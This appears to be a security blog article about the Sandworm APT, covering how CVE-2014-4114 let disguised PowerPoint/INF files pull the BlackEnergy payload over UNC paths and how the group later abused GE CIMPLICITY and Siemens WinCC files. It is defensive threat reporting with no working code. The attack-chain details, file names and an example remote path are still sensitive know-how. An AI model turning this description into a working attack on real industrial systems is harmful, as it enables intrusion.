Sandworm: the Latest APT that Threatens Industrial Control Systems

Sandworm is an APT that affected transactional systems of government bodies (NATO, Ukrainian government, etc.), acting between June and October 2014, and is currently using certain SCADA systems as an attack vector to compromise industrial environments.

Sandworm in transactional environments

Sandworm appears as a zero-day vulnerability (in trojan/self-executable format) that exploited the vulnerability CVE-2014-4114 associated with different versions of MS Windows (Vista, 7, 8, 2008, 2012).

The official name of the vulnerability was “Windows OLE Remote Code Execution Vulnerability” and the name of the payload that was downloaded was Black Energy. It has now been resolved through a patch published in bulletin MS14-060 of October 2014.

What was the attack vector?

The attack vector used was spear-fishing and the mere sharing of a Power Point file. What appeared to be a .ppt file was actually an .INF that called a remote file through a UNC path (that is, the path indicates the server or host of an internal network where the file is located, such as \\SERVERSHAREFILE.TXT or in the case of the host \\198.51.100.5REMOTE.DAT).

In principle, Windows should block this type of path from being launched from Power Point. However, here is the vulnerability, Sandworm found a way to avoid this blocking.

At this point, the .INF file connected to the C2 and downloaded two malicious files with these names slides.inf and slide1.gif (as if they were part of the PPT presentation).

The slides.inf file renamed the slide1.gif file and converted it to slide1.gif.exe

The next time the Power Point application was executed, an auto-executable (drive-by-install) that installed the malicious malware (known as Black Energy) automatically opened in the background.

Sandworm in industrial environments

After correcting this vulnerability that used files with the .INF extension, the Sandworm team has continued to “work” and is currently using .cim and .bcl type files to achieve its objectives.

These types of files are used by the CIMPLICITY HMI Solution Suite from General Electric. In fact, Sandworm deposits this type of file in the CIMPLICITY installation directory using the %CIMPATH% path.

At the time the communication with the C2 is carried out, a file called config.bak appears. This file is a CimEdit/CimView object (faceplate type) that CIMPLICITY normally uses to manage the SCADA application.

Two events are defined in the config.bak file: OnOpenExecCommand and ScreenOpenDispatch

These allow maintaining communication with the C2 and downloading different payloads: Spiskideputatovdone.pps and Slide1.gif.exe

In particular, the latter deposits the FONTCACHE.DAT file, which is a version of BlackEnergy.

The latest news indicates that, like CIMPLICITY, the Sandworm team could use the CCProjectMgrStubEx.dll files to achieve its objectives

This type of file is similar to the one found in Siemens’ WinCC solution (CCProjectMgr.exe), this type of application being a clear target for downloading Black Energy.

The ICS-CERT has echoed these attacks on systems belonging to two major automation industries (General Electric and Siemens). In fact, it has published the following alert: https://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-281-01A

It is important to note that this is an attack vector that may compromise the network in which the HMI systems are located, but does not directly affect the operation of the SCADA.

Some recommended links:

https://nakedsecurity.sophos.com/2014/10/15/the-sandworm-malware-what-you-need-to-know/

http://www.isightpartners.com/2014/10/cve-2014-4114/

http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/